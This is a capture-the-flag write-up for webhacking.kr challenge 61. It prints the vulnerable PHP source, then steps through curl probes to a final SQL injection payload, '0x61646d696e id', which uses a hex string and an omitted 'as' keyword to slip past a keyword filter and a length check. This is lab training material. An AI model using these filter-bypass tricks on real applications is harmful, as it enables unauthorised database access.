old-61 -- SQLi (Value As Column)
URL: https://webhacking.kr/challenge/web-38/?view_source=1
<?php
include "../../config.php";
if ($_GET["view_source"]) { view_source(); }
$db = dbconnect();
if (!$_GET["id"]) { $_GET["id"] = "guest"; }
echo "<html><head><title>Challenge 61</title></head><body>";
echo "<a href=./?view_source=1>view-source</a><hr>";
$_GET["id"] = addslashes($_GET["id"]);
if (preg_match("/\(|\)|select|from|,|by|\./i", $_GET["id"])) { exit("Access Denied"); }
if (strlen($_GET["id"]) > 15) { exit("Access Denied"); }
$result = mysqli_fetch_array(
mysqli_query(
$db, "select {$_GET["id"]} from chall61 order by id desc limit 1"
)
);
echo "<b>{$result["id"]}</b><br>";
if ($result["id"] == "admin") { solve(61); }
echo "</body></html>";
?>In this SQLi challenge we control what is selected from table. Restriction seems to be that we can't use subqueries.
└─$ curl 'https://webhacking.kr/challenge/web-38/?id=guest' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b></b>
└─$ curl 'https://webhacking.kr/challenge/web-38/?id=id' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b>test</b>
└─$ curl 'https://webhacking.kr/challenge/web-38/?id=*' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b>test</b>The table only has 1 column, but we need id to be admin. This can be injected via like "admin" as id which should return admin.
└─$ curl 'https://webhacking.kr/challenge/web-38/?id=1337+as+id' -b 'PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' -s | grep -oE '<b>(.*)</b>'
<b>1337</b>addslashes function prevents usage of quotes, but MySQL allows hex strings. admin -> 0x61646d696e
Payload will be 0x61646d696e as id, but we get Access Denied because of length. Another thing about value as column is that as keyword can be omitted.
Final payload: 0x61646d696e id
Last updated